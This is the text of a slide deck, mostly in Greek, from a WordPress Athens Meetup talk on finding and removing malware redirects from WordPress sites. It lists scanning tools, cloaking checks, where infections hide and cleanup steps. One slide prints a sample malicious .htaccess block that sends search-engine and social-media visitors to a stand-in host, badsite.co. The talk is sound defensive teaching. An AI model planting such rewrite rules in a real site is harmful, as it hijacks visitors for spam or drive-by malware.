Μάκης Μουρελάτος - Εντοπισμός και αφαίρεση WordPress malware redirect

Gerasimos Mourelatos WordPress Security Aficionado “… there are only two
types of companies: those that have been hacked and those that will be.” Robert Mueller, FBI Director, 2012 @makismour

16th WordPress Athens Meetup Εντ οπισμός και Αφαίρεση Malware Redirect

source: internetlivestats.com

FACTS source: codeinwp.com/blog/wordpress-statistics Το WordPress έχει τις περισσότερες παραβιάσεις από
hackers, αυτό όμως δεν σημαίνει ότι είναι και το πιο ευάλωτο. TimThumb, Revslider & Gravity Forms είναι από τα αγαπημένα plugin όσων θέλουν να παραβιάσουν μια WordPress ιστοσελίδα. Μία από τις πιο συνηθισμένες παραβιάσεις είναι τα malicious ή malware redirects.

MALWARE REDIRECT FIVE Ws Who What Where When Why Ένας
ή περισσότεροι hacker H WordPress ιστοσελίδα σας κάνει redirect σε μια άλλη -ξένη- ιστοσελίδα .htaccess, theme files, plugin files Όταν εσείς κοιμόσαστε!!! Blackhat SEO, Drive by Download

1. WORDPRESS WEBSITE SCAN Hosting Provider Quttera Virus Total Web
Inspector

2. CLOAKING ΕΛΕΓΧΟΣ ΓΙΑ Fetch Google ΒotSimulator

3. GOOGLE SITE STATUS ΕΛΕΓΧΟΣ

4. MALWARE ΕΝΤΟΠΙΣΜΟΣ .htaccess located at root & uploads dir
wp-config.php theme’s header.php footer.php functions.php

.HTACCESS RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond
%{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC,OR] RewriteCond %{HTTP_REFERER} .twitter. [OR] RewriteCond %{HTTP_REFERER} .blog. [OR] RewriteCond %{HTTP_REFERER} .live. [OR] RewriteCond %{HTTP_REFERER} .myspace. [OR] RewriteCond %{HTTP_REFERER} .linkedin. [OR] RewriteRule .* http://badsite.co/bad.php?m=123 [R,L]

WP-CONFIG.PHP

THEME'S HEADER.PHP

THEME'S FOOTER.PHP

MALWARE ΑΦΑΙΡΕΣΗ

BACKUP!!!!! Αφαίρεση και εκ νέου εγκατάσταση WordPress Αφαίρεση και εκ
νέου εγκατάσταση όλων των theme Αφαίρεση και εκ νέου εγκατάσταση όλων των plugin MALWARE ΤΟ ΚΡΥΒΕΤΑΙ ΣΤΙΣ ΛΕΠΤΟΜΕΡΕΙΕΣ

Έλεγχος όλων των admin users Έλεγχος και διαγραφή όλων των
μη WordPress αρχείων και directory Επανάληψη της διαδικασίας σε όλες της ιστοσελίδες που ανήκουν στον ίδιο hosting account MALWARE ΤΟ ΚΡΥΒΕΤΑΙ ΣΤΙΣ ΛΕΠΤΟΜΕΡΕΙΕΣ

• https://wordpress.org/about/security/ • https://malwaredecoder.com/ • https://quttera.com/ • https://www.virustotal.com • https://app.webinspector.com/
• https://www.google.com/webmasters/tools/googlebot- fetch • https://transparencyreport.google.com/safe-browsing/ search • https://www.linkedin.com/in/makismour/ USEFUL RESOURCES

Μάκης Μουρελάτος - Εντοπισμός και αφαίρεση Word...

Μάκης Μουρελάτος - Εντοπισμός και αφαίρεση WordPress malware redirect

WordPress Greek Community

More Decks by WordPress Greek Community

Other Decks in Technology

Featured

Transcript

Gerasimos Mourelatos WordPress Security Aficionado “… there are only two

16th WordPress Athens Meetup Εντ οπισμός και Αφαίρεση Malware Redirect

source: internetlivestats.com

FACTS source: codeinwp.com/blog/wordpress-statistics Το WordPress έχει τις περισσότερες παραβιάσεις από

MALWARE REDIRECT FIVE Ws Who What Where When Why Ένας

1. WORDPRESS WEBSITE SCAN Hosting Provider Quttera Virus Total Web

2. CLOAKING ΕΛΕΓΧΟΣ ΓΙΑ Fetch Google ΒotSimulator

3. GOOGLE SITE STATUS ΕΛΕΓΧΟΣ

4. MALWARE ΕΝΤΟΠΙΣΜΟΣ .htaccess located at root & uploads dir

.HTACCESS RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR] RewriteCond

WP-CONFIG.PHP

THEME'S HEADER.PHP

THEME'S FOOTER.PHP

MALWARE ΑΦΑΙΡΕΣΗ

BACKUP!!!!! Αφαίρεση και εκ νέου εγκατάσταση WordPress Αφαίρεση και εκ

Έλεγχος όλων των admin users Έλεγχος και διαγραφή όλων των

• https://wordpress.org/about/security/ • https://malwaredecoder.com/ • https://quttera.com/ • https://www.virustotal.com • https://app.webinspector.com/